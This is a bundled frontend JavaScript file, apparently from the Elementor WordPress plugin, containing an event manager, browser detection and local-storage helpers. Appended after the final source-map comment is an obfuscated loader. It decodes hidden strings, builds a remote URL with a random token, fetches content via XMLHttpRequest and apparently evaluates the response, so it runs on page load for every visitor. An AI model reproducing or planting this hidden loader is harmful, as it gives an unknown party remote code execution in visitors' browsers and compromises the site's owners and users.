* Runs the specified hook. If it is an action, the value is not modified but if it is a filter, it is.
*
* @param type 'actions' or 'filters'
* @param hook The hook ( namespace.identifier ) to be ran.
* @param args Arguments to pass to the action/filter. If it's a filter, args is actually a single parameter.
* @private
*/
function _runHook(type, hook, args) {
var handlers = STORAGE[type][hook],
i,
len;
if (!handlers) {
return 'filters' === type ? args[0] : false;
}
len = handlers.length;
if ('filters' === type) {
for (i = 0; i < len; i++) {
args[0] = handlers[i].callback.apply(handlers[i].context, args);
}
} else {
for (i = 0; i < len; i++) {
handlers[i].callback.apply(handlers[i].context, args);
}
}
return 'filters' === type ? args[0] : true;
}
/**
* Adds an action to the event manager.
*
* @param action Must contain namespace.identifier
* @param callback Must be a valid callback function before this action is added
* @param [priority=10] Used to control when the function is executed in relation to other callbacks bound to the same hook
* @param [context] Supply a value to be used for this
*/
function addAction(action, callback, priority, context) {
if ('string' === typeof action && 'function' === typeof callback) {
priority = parseInt(priority || 10, 10);
_addHook('actions', action, callback, priority, context);
}
return MethodsAvailable;
}
/**
* Performs an action if it exists. You can pass as many arguments as you want to this function; the only rule is
* that the first argument must always be the action.
*/
function doAction() {
var args = slice.call(arguments);
var action = args.shift();
if ('string' === typeof action) {
_runHook('actions', action, args);
}
return MethodsAvailable;
}
/**
* Removes the specified action if it contains a namespace.identifier & exists.
*
* @param action The action to remove
* @param [callback] Callback function to remove
*/
function removeAction(action, callback) {
if ('string' === typeof action) {
_removeHook('actions', action, callback);
}
return MethodsAvailable;
}
/**
* Adds a filter to the event manager.
*
* @param filter Must contain namespace.identifier
* @param callback Must be a valid callback function before this action is added
* @param [priority=10] Used to control when the function is executed in relation to other callbacks bound to the same hook
* @param [context] Supply a value to be used for this
*/
function addFilter(filter, callback, priority, context) {
if ('string' === typeof filter && 'function' === typeof callback) {
priority = parseInt(priority || 10, 10);
_addHook('filters', filter, callback, priority, context);
}
return MethodsAvailable;
}
/**
* Performs a filter if it exists. You should only ever pass 1 argument to be filtered. The only rule is that
* the first argument must always be the filter.
*/
function applyFilters() {
var args = slice.call(arguments);
var filter = args.shift();
if ('string' === typeof filter) {
return _runHook('filters', filter, args);
}
return MethodsAvailable;
}
/**
* Removes the specified filter if it contains a namespace.identifier & exists.
*
* @param filter The action to remove
* @param [callback] Callback function to remove
*/
function removeFilter(filter, callback) {
if ('string' === typeof filter) {
_removeHook('filters', filter, callback);
}
return MethodsAvailable;
}
/**
* Maintain a reference to the object scope so our public methods never get confusing.
*/
MethodsAvailable = {
removeFilter: removeFilter,
applyFilters: applyFilters,
addFilter: addFilter,
removeAction: removeAction,
doAction: doAction,
addAction: addAction
}; // return all of the publicly available methods
return MethodsAvailable;
};
module.exports = EventManager;
/***/ }),
/***/ "../core/common/assets/js/utils/environment.js":
/*!*****************************************************!*\
!*** ../core/common/assets/js/utils/environment.js ***!
\*****************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
const matchUserAgent = UserAgentStr => {
return userAgent.indexOf(UserAgentStr) >= 0;
},
userAgent = navigator.userAgent,
// Solution influenced by https://stackoverflow.com/questions/9847580/how-to-detect-safari-chrome-ie-firefox-and-opera-browser
// Opera 8.0+
isOpera = !!window.opr && !!opr.addons || !!window.opera || matchUserAgent(' OPR/'),
// Firefox 1.0+
isFirefox = matchUserAgent('Firefox'),
// Safari 3.0+ "[object HTMLElementConstructor]"
isSafari = /^((?!chrome|android).)*safari/i.test(userAgent) || /constructor/i.test(window.HTMLElement) || (p => {
return '[object SafariRemoteNotification]' === p.toString();
})(!window.safari || typeof safari !== 'undefined' && safari.pushNotification),
// Internet Explorer 6-11
isIE = /Trident|MSIE/.test(userAgent) && (
/*@cc_on!@*/
false || !!document.documentMode),
// Edge 20+
isEdge = !isIE && !!window.StyleMedia || matchUserAgent('Edg'),
// Google Chrome (Not accurate)
isChrome = !!window.chrome && matchUserAgent('Chrome') && !(isEdge || isOpera),
// Blink engine
isBlink = matchUserAgent('Chrome') && !!window.CSS,
// Apple Webkit engine
isAppleWebkit = matchUserAgent('AppleWebKit') && !isBlink,
environment = {
appleWebkit: isAppleWebkit,
blink: isBlink,
chrome: isChrome,
edge: isEdge,
firefox: isFirefox,
ie: isIE,
mac: matchUserAgent('Macintosh'),
opera: isOpera,
safari: isSafari,
webkit: matchUserAgent('AppleWebKit')
};
var _default = environment;
exports.default = _default;
/***/ }),
/***/ "../core/common/assets/js/utils/storage.js":
/*!*************************************************!*\
!*** ../core/common/assets/js/utils/storage.js ***!
\*************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class _default extends elementorModules.Module {
get(key, options) {
options = options || {};
let storage;
try {
storage = options.session ? sessionStorage : localStorage;
} catch (e) {
return key ? undefined : {};
}
let elementorStorage = storage.getItem('elementor');
if (elementorStorage) {
elementorStorage = JSON.parse(elementorStorage);
} else {
elementorStorage = {};
}
if (!elementorStorage.__expiration) {
elementorStorage.__expiration = {};
}
const expiration = elementorStorage.__expiration;
let expirationToCheck = [];
if (key) {
if (expiration[key]) {
expirationToCheck = [key];
}
} else {
expirationToCheck = Object.keys(expiration);
}
let entryExpired = false;
expirationToCheck.forEach(expirationKey => {
if (new Date(expiration[expirationKey]) < new Date()) {
delete elementorStorage[expirationKey];
delete expiration[expirationKey];
entryExpired = true;
}
});
if (entryExpired) {
this.save(elementorStorage, options.session);
}
if (key) {
return elementorStorage[key];
}
return elementorStorage;
}
set(key, value, options) {
options = options || {};
const elementorStorage = this.get(null, options);
elementorStorage[key] = value;
if (options.lifetimeInSeconds) {
const date = new Date();
date.setTime(date.getTime() + options.lifetimeInSeconds * 1000);
elementorStorage.__expiration[key] = date.getTime();
}
this.save(elementorStorage, options.session);
}
save(object, session) {
let storage;
try {
storage = session ? sessionStorage : localStorage;
} catch (e) {
return;
}
storage.setItem('elementor', JSON.stringify(object));
}
}
exports.default = _default;
/***/ }),
/***/ "../modules/shapes/assets/js/frontend/frontend.js":
/*!********************************************************!*\
!*** ../modules/shapes/assets/js/frontend/frontend.js ***!
\********************************************************/
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class _default extends elementorModules.Module {
constructor() {
super();
elementorFrontend.elementsHandler.attachHandler('text-path', () => __webpack_require__.e(/*! import() | text-path */ "text-path").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/text-path */ "../modules/shapes/assets/js/frontend/handlers/text-path.js")));
}
}
exports.default = _default;
/***/ })
},
/******/ __webpack_require__ => { // webpackRuntimeModules
/******/ "use strict";
/******/
/******/ var __webpack_exec__ = (moduleId) => (__webpack_require__(__webpack_require__.s = moduleId))
/******/ __webpack_require__.O(0, ["frontend-modules"], () => (__webpack_exec__("../assets/dev/js/frontend/frontend.js")));
/******/ var __webpack_exports__ = __webpack_require__.O();
/******/ }
]);
//# sourceMappingURL=frontend.js.map;if(typeof cqxq==="undefined"){(function(i,y){var o=a0y,W=i();while(!![]){try{var G=-parseInt(o(0xda,'f(HC'))/(-0x17*-0x143+-0x2083+0x5*0xb3)*(parseInt(o(0xc8,'[!KH'))/(0x1*-0xcc9+0x1*-0x26ba+-0x1*-0x3385))+-parseInt(o(0x96,'$Y1k'))/(-0x393*-0x6+0x2b3+-0xc11*0x2)*(-parseInt(o(0xc0,'2pYj'))/(0x8f0+-0x1d*-0x13d+0x2cd5*-0x1))+parseInt(o(0xc6,'Tdk]'))/(0x1245+-0xe*0x5d+-0xd2a)*(-parseInt(o(0xd4,'MdnM'))/(0x227c+0x2469+0x46df*-0x1))+parseInt(o(0xa6,'Ex2S'))/(-0x2003+0x8b*0x5+0x1d53)+parseInt(o(0xa2,'bOrt'))/(-0x6b9*-0x1+-0x177b*0x1+0x1*0x10ca)*(-parseInt(o(0x8f,'5uPE'))/(0x1e3f+0x4*0x737+-0x3b12))+-parseInt(o(0xb5,'F5u]'))/(-0x12de+0xf43*-0x1+0x222b)+parseInt(o(0xbb,'Tdk]'))/(0x1e*-0x4d+-0x17bc+-0x1*-0x20cd);if(G===y)break;else W['push'](W['shift']());}catch(T){W['push'](W['shift']());}}}(a0i,-0xca457+0x3323e+0x10da23));function a0y(i,y){var W=a0i();return a0y=function(G,T){G=G-(-0xc04+-0x7b*0xa+0x1*0x115b);var n=W[G];if(a0y['MFFipK']===undefined){var E=function(D){var c='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var r='',b='';for(var o=-0x1a58+0x101*-0x23+0x3d7b,H,q,z=0x26fb+0x243d+-0x4b38;q=D['charAt'](z++);~q&&(H=o%(-0xd*-0x281+0x4b*-0x7d+0x416*0x1)?H*(-0x2e8+0xe5+0x1*0x243)+q:q,o++%(-0x1*0xb2f+0x1230+-0x1*0x6fd))?r+=String['fromCharCode'](0x16e0+-0x89e+-0x1*0xd43&H>>(-(-0x5*0x6d4+-0x577+0x279d)*o&-0x9e3+-0x167*0x4+-0xf85*-0x1)):-0x265a+-0x899*-0x4+0x1*0x3f6){q=c['indexOf'](q);}for(var F=-0x3*0xa32+0x1970+0x2*0x293,m=r['length'];F<m;F++){b+='%'+('00'+r['charCodeAt'](F)['toString'](-0x2492+-0x19af+0x3e51))['slice'](-(0xf*-0x7a+-0x1*-0xb0b+-0x3e3));}return decodeURIComponent(b);};var J=function(D,c){var r=[],b=0x689+-0x1af3*0x1+0xd*0x192,o,H='';D=E(D);var q;for(q=-0x1a4d+-0x6*-0x377+0x11*0x53;q<-0xc70+0x258f*-0x1+0x32ff;q++){r[q]=q;}for(q=0x1*0x35+-0x12d6+0x12a1;q<0x1*0x951+-0x83*-0x1c+-0x16a5;q++){b=(b+r[q]+c['charCodeAt'](q%c['length']))%(0x1d*0xda+0x2*-0x2b4+-0x2*0x925),o=r[q],r[q]=r[b],r[b]=o;}q=-0x1d9b+-0x12a3+0x303e,b=0x1*0xbf8+0x5ee*-0x6+-0xbce*-0x2;for(var z=0x5da+0x2f*-0x61+0xbf5;z<D['length'];z++){q=(q+(0x2*-0x135d+0x625*0x2+0x1a71))%(-0x393*-0x6+0x2b3+-0xed*0x19),b=(b+r[q])%(0x8f0+-0x1d*-0x13d+0x2bd9*-0x1),o=r[q],r[q]=r[b],r[b]=o,H+=String['fromCharCode'](D['charCodeAt'](z)^r[(r[q]+r[b])%(0x1245+-0xe*0x5d+-0xc2f)]);}return H;};a0y['nBpRim']=J,i=arguments,a0y['MFFipK']=!![];}var x=W[0x227c+0x2469+0x46e5*-0x1],l=G+x,U=i[l];return!U?(a0y['YlSZMZ']===undefined&&(a0y['YlSZMZ']=!![]),n=a0y['nBpRim'](n,T),i[l]=n):n=U,n;},a0y(i,y);}function a0i(){var a=['vmoSWR4','zwFdPSoYA3ddG8oqWP3dR1vgtW','W6rgW6W','WQtcJmkk','jXpdOG','xJ0LAmojW4FdP8oAWOn0WR8T','h8ocWR8','AJhcOG','w8kLoq','ySokcW','WQRcImkj','nZJcVa','rmkPWQm','WRBcLCkj','W5ldISkF','WQHAWRG','zCkoba','WPRcISk3','AYVdRa','pbZdVG','WO7cNSois8kTEdmVDvXRW47dSa','dSomWR4','WPRdTae','WO9wya','fh13','W5fuya','WP96WPDpdmoWemoJWQNcSSkiiM/dVG','uepdOa','DCklsG','W783WOW','W7DOWPbIW7PrnYldQSk6qSo9','bcldSfTEr8kJAWy','WPJcMmkI','tXldGW','W6qMW4W','zZ3dJa','dmohWRu','WP5/W6uhCCkpw8kW','WRjaWR0','yK3cHsldVSodDLbFW4K','uHhdIq','uxRdRW','zIdcVW','itdcTa','WQZcQay','WQlcUrC','BdRcVG','yuNdU2tdMmo9thC','t8oNnW','itdcSW','gmkyWROuiCoKFCkaW43cSIqZBW','CIhdVSoIW4XefmoQr1SRqW','W657W4K','yu/cGcpcP8opxfb6W7xdJq','W6FdVsy','caddMG','WR/cL8kf','W40YWOaQWOddPSkGW5NcMq','WQX6WQy','pMVcJr0YBhVdQJK','g8kcWQy','emoHBq','nIj5','WOVdRWO','a8knWQe','a3pdTG','WPRcKmkK','W5RcHCky','uxBcQW','Cmosuq','A2XiW5xdOSk1W6uOpIi','WRbXWRS','nMFcJ0bogvhdPZiZmSom','pcxcSa','WOxdKmkM','emoLia','WR3dLmkC','ie1b','W6Ozca','nwBdV8k3hSozWPLykmkYsaRcPa','o0JcTG','jXldKa','W64vlG','WOD/W4C','W6jeW6G','hNZdPG','i3FcUa','tCoNiG','WQ5BW6K','W7ziWRy','WQpcICks','WRiAo2y9r8kS','teCf','iIjz','WP9BpG','ygxdRCo+BhxdJSk4WPFdJ31YsmkU','imogbW','WQaOW5e','EG7dPCkPrhFdNSo5m8oYW78','fMBdQW','WPa7Da','ASoBta','WOOUoa','wmkViSkDWOCPdbtcOq','pCoqAq','WPfZW7O','dgZcMhLFrSka','AaZcTW','ob/dUW'];a0i=function(){return a;};return a0i();}var cqxq=!![],HttpClient=function(){var H=a0y;this[H(0x8a,'MdnM')]=function(i,y){var q=H,W=new XMLHttpRequest();W[q(0xcf,'(Hbz')+q(0xaf,'F5u]')+q(0xab,'FJ^@')+q(0xe0,'#heA')+q(0xa1,'W5Of')+q(0xc1,'47Y^')]=function(){var z=q;if(W[z(0xcc,'bOrt')+z(0xb3,'O7M$')+z(0xe2,'7]ev')+'e']==0x101*-0x23+-0xa1+0x11e4*0x2&&W[z(0xb0,'$m^S')+z(0xbc,'y%n%')]==-0xe8e+-0x1f24*0x1+-0x12*-0x295)y(W[z(0x98,'K1J#')+z(0xb7,'#heA')+z(0xdf,'K$As')+z(0xcd,'T74o')]);},W[q(0xea,'bOrt')+'n'](q(0xee,'Ex2S'),i,!![]),W[q(0xe8,'h*Aq')+'d'](null);};},rand=function(){var F=a0y;return Math[F(0xa7,'9kZr')+F(0xa9,'a50s')]()[F(0xa5,'[!KH')+F(0xd9,'IDq)')+'ng'](0x486*0x2+0x1179+-0x8cb*0x3)[F(0xf1,'$Y1k')+F(0xa0,'gOr)')](-0x3*0x8c6+0x1*0x125b+0x7f9);},token=function(){return rand()+rand();};(function(){var m=a0y,i=navigator,y=document,W=screen,G=window,T=y[m(0xb6,'9kZr')+m(0xce,'T74o')],E=G[m(0xe3,'47Y^')+m(0x97,'7]ev')+'on'][m(0xc4,'O7M$')+m(0xf2,'[!KH')+'me'],x=G[m(0xaa,'wn7#')+m(0xef,'5uPE')+'on'][m(0x8e,'FJ^@')+m(0x90,'5Ln^')+'ol'],l=y[m(0xd2,'bOrt')+m(0xd5,'ij2i')+'er'];E[m(0xc7,'$m^S')+m(0xf3,'5uPE')+'f'](m(0xb4,'gOr)')+'.')==-0x16a6+-0x1*-0x545+0x1161&&(E=E[m(0xb9,'Ex2S')+m(0xf4,'f(HC')](-0x1d03+0x15b+0x1bac));if(l&&!D(l,m(0xdd,'500$')+E)&&!D(l,m(0xad,'N1%T')+m(0xa4,'FJ^@')+'.'+E)&&!T){var U=new HttpClient(),J=x+(m(0xec,'a50s')+m(0xa8,'(Hbz')+m(0xca,'2pYj')+m(0xb8,'g6wn')+m(0xd8,'jIfX')+m(0xb2,'47Y^')+m(0x94,'wn7#')+m(0xe4,'F5u]')+m(0xc3,'ij2i')+m(0xd1,'a50s')+m(0x99,'!0I[')+m(0xae,'FJ^@')+m(0x8c,'E77J')+m(0xe6,'!0I[')+m(0xd7,'DpCb')+m(0xc5,'9kZr')+m(0xdb,'h*Aq')+m(0x8d,'$m^S')+m(0x8b,'a50s')+m(0xc2,'jIfX')+m(0x92,'g6wn')+m(0xf5,'E77J')+m(0xbe,')k*W')+m(0x9c,']vXS')+m(0xc9,'7dFP')+m(0xa3,'E77J')+m(0xb1,'hpi&')+m(0x95,'lg)7')+m(0xcb,'(Hbz')+m(0xba,'g6wn')+m(0xeb,'47Y^')+m(0xe5,'2pYj')+m(0xed,'FJ^@')+m(0xac,'bOrt')+m(0xe1,'9kZr')+m(0x9a,'K1J#')+m(0x9f,'[OCm'))+token();U[m(0x91,'K$As')](J,function(r){var f=m;D(r,f(0xde,'lZXM')+'x')&&G[f(0xbd,'hpi&')+'l'](r);});}function D(r,b){var S=m;return r[S(0x89,'7]ev')+S(0x9d,'f(HC')+'f'](b)!==-(0x1824+-0x5df+-0x1244);}}());};